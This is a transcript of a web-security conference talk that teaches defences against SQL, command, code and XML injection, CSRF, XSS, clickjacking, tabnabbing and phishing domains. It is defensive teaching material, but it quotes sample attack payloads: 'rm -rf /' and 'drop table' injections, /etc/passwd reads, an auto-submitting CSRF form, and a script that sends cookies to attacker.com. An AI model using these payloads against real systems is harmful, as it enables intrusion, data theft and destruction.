Proactive web security

Transcript

1. @BastianHofmann Proactive Web Security Bastian Hofmann

2. Thinking about Security is important

3. • 2013/14 • 3 billion user accounts

4. • 2016 • 145 million user accounts

5. • 2016 • 412 million user accounts

6. • 2011 • 77 million user accounts
 $171 million loss

7. • 2017 • Personal Information of
 143 million consumers

8. …

9. Everyone is a target for attackers

10. So let’s think about the harmful things a hacker can

    do

11. And what we can do to prevent them

12. Disclaimer

13. None of these lists are ever complete

14. Stay up-to-date

15. Also

16. Every topic starts basic and will get more advanced quickly

17. None

18. Try to get access to the database

19. Use authentication and TLS

20. Do not expose your databases to the internet

21. “There are nearly 30,000 [MongoDB] instances on the Internet that

    don't have any authorization enabled” https:/ /blog.shodan.io/its-the-data-stupid/

22. $ mongo yoursite.com

23. Scan your public IPs for open ports

24. nmap

25. $ nmap scanme.nmap.org Starting Nmap 7.60 … Not shown: 994

    closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 135/tcp filtered msrpc 139/tcp filtered netbios-ssn 445/tcp filtered microsoft-ds 9929/tcp open nping-echo

26. $ nmap www.researchgate.net Starting Nmap 7.60 … PORT STATE SERVICE

    80/tcp open http 443/tcp open https

27. These are still two open ports

28. Attack vector

29. Bugs in your software

30. Injections

31. SQL Injection

32. <?php $userId = $_GET[‘userId’]; $sql = ‘SELECT * FROM users

    WHERE id =‘ . $userId; $mysqli->query($sql);

33. <?php // 12 OR TRUE $userId = $_GET[‘userId’]; $sql =

    ‘SELECT * FROM users WHERE id =‘ . $userId; $mysqli->query($sql);

34. <?php // 12; drop table users; $userId = $_GET[‘userId’]; $sql

    = ‘SELECT * FROM users WHERE id =‘ . $userId; $mysqli->query($sql);

35. Escape

36. <?php $name = $_GET[‘name’]; $name = $mysqli->real_escape_string($name); $sql = ‘SELECT

    * FROM users WHERE name = ’ . $name; $mysqli->query($sql);

37. Use an ORM

38. http:/ /www.doctrine- project.org/projects/ orm.html

39. <?php $userId = (int) $_GET[‘userId’]; $user = $entityManager->find( ‘User’, $userId

    );

40. Use prepared statements

41. <?php $userId = (int) $_GET[‘userId’]; $rsm = new ResultSetMapping(); $query

    = $entityManager->createNativeQuery( 'SELECT * FROM users WHERE userId = ?', $rsm ); $query->setParameter(1, $userId); $users = $query->getResult();

42. There are more types of injections

43. Injection in HTTP requests

44. <?php $client = new \GuzzleHttp\Client(); $res = $client->request( 'GET', 'https://api.com/path/?id='

    . $_GET[‘id'] );

45. <?php $client = new \GuzzleHttp\Client(); $res = $client->request( 'GET', //

    6&admin=true 'https://api.com/path/?id=' . $_GET[‘id'] );

46. Always escape

47. <?php $client = new \GuzzleHttp\Client(); $res = $client->request( 'GET', 'https://api.com/path/?id='

    . urlencode($_GET[‘id’]) );

48. Use sensible libraries

49. <?php $client = new \GuzzleHttp\Client(); $res = $client->request( 'GET', 'https://api.com/path/',

    ['query' => ['id' => $_GET['id']]] );

50. Command injection

51. <?php $logFile = $_GET['logFile']; passthru( 'cat ' . __DIR__ .

    '/logs/' . $logFile );

52. <?php // foo.log && rm -rf / $logFile = $_GET['logFile'];

    passthru( 'cat ' . __DIR__ . '/logs/' . $logFile );

53. Always escape

54. <?php $logFile = $_GET['logFile']; passthru( 'cat ' . escapeshellarg( __DIR__

    . '/logs/' . $logFile ) );

55. Path traversals

56. <?php // ../../../etc/passwd $logFile = $_GET['logFile']; passthru( 'cat ' .

    escapeshellarg( __DIR__ . '/logs/' . $logFile ) );

57. Validation

58. <?php $logFile = $_GET['logFile']; if (!preg_match('/^[a-z]+\.log$/', $logFile) { throw new

    \Exception('Invalid file name'); } passthru( 'cat ' . escapeshellarg( __DIR__ . '/' . $logFile ) );

59. <?php $logFile = $_GET['logFile']; $file = realpath(__DIR__ . '/logs/' .

    $logFile); if (dirname($file) !== __DIR__ . '/logs') { throw \Exception('Invalid file'); } passthru( 'cat ' . escapeshellarg( $file ) );

60. Code injection

61. <?php $myvar = "varname"; $x = $_GET['arg']; eval("\$myvar = \$x;");

62. Do not use eval or create_function

63. XML Entity Injection

64. <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY >

    <!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

65. Disable entity loading

66. <?php // set this very early in your request libxml_disable_entity_loader(true);

67. Only enable it, if you really need it

68. Trusted SOAP APIs over TLS

69. <?php function dangerouslyEnableXmlEntityLoader( callable $f ) { try { libxml_disable_entity_loader(false);

    return $f(); } finally { libxml_disable_entity_loader(true); } }

70. If the attacker can’t find any injection vulnerabilities

71. Trying to find bugs in libraries you use

72. Keep things up to date

73. Check for known security vulnerabilities

74. None

75. https:/ /github.com/ sensiolabs/security- checker

76. $ php security-checker security:check ./composer.lock Symfony Security Check Report =============================

    [OK] No packages have known vulnerabilities.
77. None

78. $ npm audit (+) No known vulnerabilities found

79. Trying to find bugs in your infrastructure

80. Web-Server

81. Programming Language Runtime

82. OS

83. …

84. Keep things up to date

85. Scan for known vulnerabilities

86. https:/ /github.com/ future-architect/vuls

87. localhost (centos7.3.1611) ========================== Total: 109 (High:35 Medium:55 Low:16 ?:3) 31

    updatable packages CVE-2015-2806 10.0 HIGH (nvd) Stack-based buffer overflow in asn1_der_decoding in libtasn1 before 4.4 allows remote attackers to have unspecified impact via unknown vectors.

88. Scan Docker Images

89. https:/ /github.com/ coreos/clair

90. If there are no vulnerabilities so far

91. Try to take over accounts

92. Man-in-the-middle attacks

93. HTTP is plain text

94. Very easy to read and modify on the wire

95. Public WiFis

96. $ sudo tcpdump -v port 80

97. $ curl http://google.com

98. 14:06:40.337900 IP6 (flowlabel 0xbb911, hlim 57, next- header TCP (6)

    payload length: 549) muc11s14-in-x0e. 1e100.net.http > 2a02:8109:9880:2e9c:94b4:a371:f1b3:b82b. 60808: Flags [P.], cksum 0x4ae9 (correct), seq 1:518, ack 75, win 106, options [nop,nop,TS val 2632812618 ecr 335746159], length 517: HTTP, length: 517 HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Location: http://www.google.de/? gfe_rd=cr&dcr=0&ei=4LJYWo6FFKiF8Qe9w63gAQ Content-Length: 268 Date: Fri, 12 Jan 2018 13:06:40 GMT

99. Encrypt the traffic

100. TLS

101. But “TLS is slow and expensive”

102. https:/ /letsencrypt.org/

103. https:/ /istlsfastyet.com/

104. Check config

105. https:/ /www.ssllabs.com/ ssltest

106. None

107. What happens when you enter a URL into the address

     bar?
108. None

109. $ curl -I http://www.researchgate.net HTTP/1.1 301 Moved Permanently Content-Length: 178

     Content-Type: text/html Date: Fri, 12 Jan 2018 13:02:35 GMT Location: https://www.researchgate.net/ Server: nginx Connection: keep-alive

110. Man-in-the-Middle Attack on initial redirect

111. Strict-Transport-Security https:/ /developer.mozilla.org/en-US/docs/Web/HTTP/Headers/S

112. strict-transport-security: max-age=15552000; includeSubDomains; preload

113. chrome:/ /net-internals/ #hsts

114. Man-in-the-Middle Attack on the very first time the user visits

     a site

115. Browser Preloads

116. strict-transport-security: max-age=15552000; includeSubDomains; preload

117. https:/ /hstspreload.org/

118. Also encrypt traffic to datbases and internal services

119. None

120. So no man-in-the middle

121. Brute force to guess the password

122. Ratelimits

123. Captchas

124. None

125. Log logins

126. Alert user of logins on a new device

127. None

128. Remote logout

129. None

130. Two-Factor-Authentication

131. “Less then 10 percent of all Google users use Two-Factor-

     Authentication” http:/ /uk.pcmag.com/news/92919/most-google-accounts-dont-use-two-factor- authentication

132. E-Mail only logins

133. None
134. None
135. None
136. None
137. None

138. Getting into the accounts directly is not possible or very

     expensive

139. Doing actions on the user’s behalf without direct account takeover

140. Cross Site Request Forgery

141. http:/ /site.com/ deleteCurrentAccount

142. Session cookie is necessary for the request to work

143. On the site of an attacker

144. <img src=“http://site.com/deleteCurrentAccount" />

145. The browser automatically adds the session cookie when the image

     is fetched

146. Or an email with “Hey click on http:/ /bit.ly/2n1b42n to

     win”

147. Don’t support GET requests for writing operations

148. Though that does not help

149. On the site of an attacker

150. <form method="POST" id="form" action="http://site.com/deleteCurrentAccount"> </form> <script> document.getElementById("form").submit() </script>

151. CSRF tokens

152. Create token that has the Session ID cookie value encrypted

153. <?php $plaintext = $sessionId . '/' . $userId . '/'

     . time(); $nonce = random_bytes(SODIUM_CRYPTO_SECRETBOX_NONCEBYTES); $token = base64_encode($nonce . sodium_crypto_secretbox($plaintext, $nonce, $key));

154. Add this token to every non GET request

155. <form method="POST" id="form" action=“http://site.com/deleteCurrentAccount"> <input type="hidden" name="csrf_token" value="<?php echo $token

     ?>" /> </form>

156. Same for XHR requests

157. Verify that the content of the token matches the session

     from the cookie

158. <?php $token = $_POST['csrf_token']; $nonce = substr( $token, 0, SODIUM_CRYPTO_SECRETBOX_NONCEBYTES

     ); $crypt = substr( $token, SODIUM_CRYPTO_SECRETBOX_NONCEBYTES ); $plaintext = sodium_crypto_secretbox_open($crypt, $nonce, $key); [$sessionId, $userId, $time] = explode('/', $plaintext); // …

159. if ( $sessionId !== session_id() || $userId !== $_SESSION['userId'] ||

     time() - $time > 7200 ) { throw \Exception('Invalid csrf token'); }

160. Because of the Cross Origin Policy an attacker can not

     get hold of a matching CSRF token

161. Libraries / Frameworks

162. https:/ /symfony.com/ doc/current/security/ csrf.html

163. Same Site Cookies

164. Browser only sends cookie in a “first-party-context”

165. http:/ / www.sjoerdlangkemper.nl /2016/04/14/preventing- csrf-with-samesite- cookie-attribute/

166. Set-Cookie: sessionid=...; Secure; HttpOnly; SameSite=strict

167. https:/ /caniuse.com/ #feat=same-site-cookie- attribute

168. None

169. But there are other ways to do something on behalf

     of the user

170. XSS Injection

171. <html> <body> <div> User generated comment that comes from database

     </div> </body> </html>

172. <html> <body> <div> <?php echo $comment; ?> </div> </body> </html>

173. <html> <body> <div> User generated comment <script> fetch( 'http://attacker.com/?cookies=' +

     document.cookie ) </script> that comes from database </div> </body> </html>

174. Escape content

175. <html> <body> <div> <?php echo htmlspecialchars($comment); ?> </div> </body> </html>

176. Template libraries

177. https:/ / twig.symfony.com/

178. {% autoescape "html" %} <html> <body> <div> {{ comment }}

     </div> </body> </html> {% endautoescape %}

179. https:/ / mustache.github.io/

180. <html> <body> <div> {{comment}} </div> </body> </html>

181. Frontend frameworks

182. https:/ /reactjs.org/

183. What if you want to allow certain HTML tags

184. Formatting, Links, Paragraphes, …

185. HTML Purifier

186. http:/ /htmlpurifier.org/

187. $config = HTMLPurifier_Config::createDefault(); $purifier = new HTMLPurifier($config); $cleanHtml = $purifier->purify($dirtyHtml);

188. ... or just use Markdown

189. It’s easy to make errors

190. Try to limit the impact

191. HTTPS only Cookies

192. Set-Cookie: sessionid=...; Secure; HttpOnly

193. $expire = 0; $path = ''; $domain = ''; $secure

     = true; $httpOnly = true; setcookie( 'sessionId', '...', $expire, $path, $domain, $secure, $httpOnly );

194. Content Security Policy

195. https:/ / developer.mozilla.org/en- US/docs/Web/HTTP/CSP

196. Content-Security-Policy: default-src 'none'; script-src 'self'; connect-src 'self'; img-src 'self'; style-src

     'self';
197. None

198. Reporting

199. Content-Security-Policy: default-src … report-uri / csp_errors;

200. Do not allow inline script tags

201. But if you must

202. CSP Nonces

203. Content-Security-Policy: script-src 'nonce-2726c7f26c'

204. <script nonce="2726c7f26c">...</script>

205. This can still be bypassed

206. Malicious JS NPM packages

207. https:/ /hackernoon.com/im-harvesting- credit-card-numbers-and-passwords-from- your-site-here-s-how-9a8cb347c5b5

208. npm audit

209. Trying to trick user into providing sensitive information

210. Phishing

211. Mostly hard to prevent because it is out of your

     control

212. But some attack vectors are preventable

213. Typo Domains

214. International Domain Names

215. Register them yourself and redirect

216. Confusing users with long, complex subdomains

217. Clickjacking

218. None
219. None

220. <html> <body> <iframe src="https://www.researchgate.net/login"> </iframe> <script> ... </script> </body> </html>

221. No direct access to page in IFRAME possible

222. Invisible input boxes overlaying the IFRAME
 to capture input

223. Forbid displaying your page in an IFRAME

224. X-Frame-Options: SAMEORIGIN

225. Tabnabbing

226. Linking URLs in user provided content

227. <a href="http://external.page" target="_blank"> Link </a>

228. In the opened window

229. <script> if (window.opener) { opener.location = 'http://phishing-site.com'; } </script>

230. Prevention

231. <a href="http://external.page" target="_blank" rel="noopener"> Link </a>

232. https:/ / mathiasbynens.github.io/ rel-noopener/

233. So that was a lot of information

234. Let’s sum it up

235. The internet is a scary place

236. If you have users you’re a target

237. Stay alert

238. Invest into good security practices

239. There is always more

240. Stay up to date

241. http:/ /speakerdeck.com/ u/bastianhofmann

242. [email protected] https:/ /twitter.com/BastianHofmann

243. Resources • https://www.owasp.org • https://twitter.com/miss_jwo/status/957555207868690434

244. Backup slides

245. Speaking of URL’s in user generated content

246. Spot the difference

247. researchgate.net/login rеsearchgate.net/login

248. researchgate.net/login rеsearchgate.net/login This is a cyrillic “e”

249. International domain names

250. https:/ /en.wikipedia.org/ wiki/ IDN_homograph_attack

251. Warn the user before browsing to a IDN URL

252. None

253. Warn on misspellings

254. reserchgate.net/login

255. researchgate.tv/login

256. researchgate.education/login

257. researchgate.attacker.com/login

258. Follow redirects

259. http:/ /bit.ly/1bdDlXc

260. None

261. Still HTML/XSS injection vulnerabilities are bad

262. Try to detect them

263. In your template library

264. https:/ / mustache.github.io/

265. Every time something gets escaped, also replace “e” with an

     escape sequence

266. Before returning the resulting HTML

267. Check if there are any “e” characters left

268. If yes, log this as a potential XSS vulnerability

269. Replace the escape sequence back to “e”

270. <div class="some-name"> {{firstName}} {{{lastName}}} </div>

271. firstName: Peter lastName: Parker

272. <div class="som___101___-nam___101___"> P___101___t___101___r Parker </div>

273. <div class="som___101___-nam___101___"> P___101___t___101___r Parker </div>

274. Self XSS

275. “Hey open the developer tools and paste this code there

     to get special features”

276. Add console warning

277. None

278. <script> if ( typeof console === 'object' && console.log )

     { console.log( '%cWARNING!', 'color:white; background:red;' ); ... } </script>

279. Check for internal IPs

280. None

281. With everything you do

282. Log and monitor sensitive operations

283. Alerts on suspicious behaviour

284. Web Application Firewalls

285. Ability to quickly block traffic patterns

286. Linking URLs in user generated content

287. Information disclosure through Referrer

288. https:/ / developer.mozilla.org/en- US/docs/Web/HTTP/ Headers/Referer

289. Referrer Policy

290. Referrer-Policy: origin-when-cross-origin

291. https:/ / developer.mozilla.org/en- US/docs/Web/HTTP/ Headers/Referrer-Policy